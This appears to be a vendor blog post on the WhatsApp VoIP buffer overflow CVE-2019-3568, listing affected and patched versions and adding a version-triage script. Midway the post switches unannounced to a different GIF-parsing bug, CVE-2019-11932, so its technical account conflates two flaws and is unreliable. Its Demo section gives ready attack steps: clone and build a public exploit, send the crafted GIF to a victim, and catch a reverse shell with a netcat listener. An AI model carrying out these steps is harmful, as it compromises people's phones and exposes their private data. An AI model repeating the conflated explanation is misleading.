WhatsApp Buffer Overflow Vulnerability

WhatsApp Vulnerability


WhatsApp's new vulnerability has attracted the attention of media and security experts around the world. Zimperium ZLabs will be publishing a detailed blog post soon, but for now we want to give our readers the first details.

Below is a quick summary of the risk. There are rumors that the vulnerability was used by the NSO Group, but no evidence has been provided to the media to support this. As it stands, this post only covers the risk analysis and how Zimperium can help.
#Background

On May 13, Facebook announced a vulnerability that affects all of its WhatsApp products. The vulnerability was reported as exploited in the wild and was designated CVE-2019-3568.

WhatsApp told the BBC that its security team was the first to identify the flaw, earlier this month. It shared that information with human rights groups, select security vendors and the U.S. Department of Justice.
#The CVE-2019-3568 vulnerability

WhatsApp is affected by a buffer overflow, which means an attacker can use it to run malicious code on the device. Specially crafted data packets sent during call setup can trigger the overflow and give the attacker control of the application. The attacker can then push surveillance tools onto the device to be used against the target.

Definition: A buffer overflow vulnerability in the WhatsApp VoIP (Voice over Internet Protocol) stack allows remote code execution via a specially crafted series of SRTP (Secure Real-Time Transport Protocol) packets sent to a target phone number.

#Affected versions:

    WhatsApp for Android before v2.19.134
    WhatsApp Business for Android before v2.19.44
    WhatsApp for iOS before v2.19.51
    WhatsApp Business for iOS before v2.19.51
    WhatsApp for Windows Phone before v2.18.348
    WhatsApp for Tizen before v2.18.15

#Solutions

    Apply the vendor's fix by updating to:
    WhatsApp for Android 2.19.274 and later versions
    WhatsApp for iOS 2.19.100 and later versions
    WhatsApp Enterprise Client 2.25.3 and later versions
    WhatsApp for Windows Phone 2.18.368 and later versions
    WhatsApp Business for Android 2.19.104 and later versions
    WhatsApp Business for iOS 2.19.100 and later versions

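As an added example (not from the original post, and not WhatsApp's or Zimperium's code), a small inventory check that flags installed builds older than the first fixed build listed above and names the upgrade target from the Solutions section. The platform labels and the sample inventory are constructed assumptions; the version numbers are the ones in this post.

```python
from typing import Iterable, List, Tuple

# "before vX" in the affected list means X is the first non-vulnerable build.
# Platform keys are my own labels (assumption); versions are from the post.
FIRST_SAFE = {
    "android": "2.19.134",
    "android-business": "2.19.44",
    "ios": "2.19.51",
    "ios-business": "2.19.51",
    "windows-phone": "2.18.348",
    "tizen": "2.18.15",
}
# Builds the Solutions section recommends upgrading to.
RECOMMENDED = {
    "android": "2.19.274",
    "android-business": "2.19.104",
    "ios": "2.19.100",
    "ios-business": "2.19.100",
    "windows-phone": "2.18.368",
}

def parse_version(v: str) -> Tuple[int, ...]:
    """Turn 'v2.19.134' / '2.19.134' into a tuple that compares numerically."""
    return tuple(int(part) for part in v.strip().lstrip("vV").split("."))

def is_vulnerable(platform: str, installed: str) -> bool:
    """True if the installed build predates the first fixed build for its platform."""
    key = platform.lower()
    if key not in FIRST_SAFE:
        raise ValueError(f"unknown platform: {platform}")
    return parse_version(installed) < parse_version(FIRST_SAFE[key])

def triage(inventory: Iterable[Tuple[str, str, str]]) -> List[Tuple[str, str, str, str]]:
    """(device_id, platform, version) rows -> (device_id, platform, version, upgrade_to)."""
    findings = []
    for device_id, platform, version in inventory:
        if is_vulnerable(platform, version):
            key = platform.lower()
            findings.append((device_id, platform, version, RECOMMENDED.get(key, FIRST_SAFE[key])))
    return findings

# Constructed sample inventory, not real devices.
SAMPLE = [
    ("dev-01", "android", "2.19.120"),
    ("dev-02", "android", "v2.19.134"),
    ("dev-03", "ios-business", "2.19.50"),
    ("dev-04", "tizen", "2.18.15"),
]
```

Running `triage(SAMPLE)` reports dev-01 and dev-03 as vulnerable with their upgrade targets; dev-02 and dev-04 are already on or past the first fixed build.
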
#How does this vulnerability work?

WhatsApp uses a GIF parsing library to generate previews of GIF files when a user opens the device gallery before sending a media file to friends or family. Notably, simply sending a malicious GIF file does not trigger the vulnerability; it is triggered when the victim opens the WhatsApp gallery picker while trying to send a media file. To exploit this issue, an attacker only needs to deliver a specially crafted GIF file to an Android user through any channel and wait for the victim to open the photo gallery in WhatsApp. However, if the file is sent over a messaging platform such as WhatsApp or Messenger, it must be sent as a document rather than as a media attachment, because the image compression these services apply to media would corrupt the malicious payload hidden in the image. As shown in the video demonstration, the vulnerability can be used to obtain a reverse shell from the compromised device.

#Demo:

Step 1: git clone https://github.com/AshuJaiswal109/CVE-2019-11932

Step 2: make && ./exploit exploit1.gif

Step 3: Copy the output, paste it into a text file, save it with the .gif extension, and send the resulting exploit1.gif file to the victim.

Then use netcat to receive the victim's shell:

nc -lvp 5555

When the victim opens their gallery in WhatsApp, you will get the shell.

#WhatsApp GIF Attack Vectors

The WhatsApp GIF vulnerability can be exploited in two ways.

Local: A malicious app installed on the device collects the addresses of the zygote libraries and generates a crafted GIF file that leads to code execution in the WhatsApp context. This lets the app steal files from the WhatsApp sandbox, including the database.

Remote code execution: By pairing this bug with a remote memory disclosure vulnerability in another app on the same system, an attacker can collect the zygote library addresses and craft a malicious GIF file to send to the user via WhatsApp (as a document attachment, not as an image through the Gallery Picker: WhatsApp tries to convert media files to MP4, which would render the malicious GIF useless).
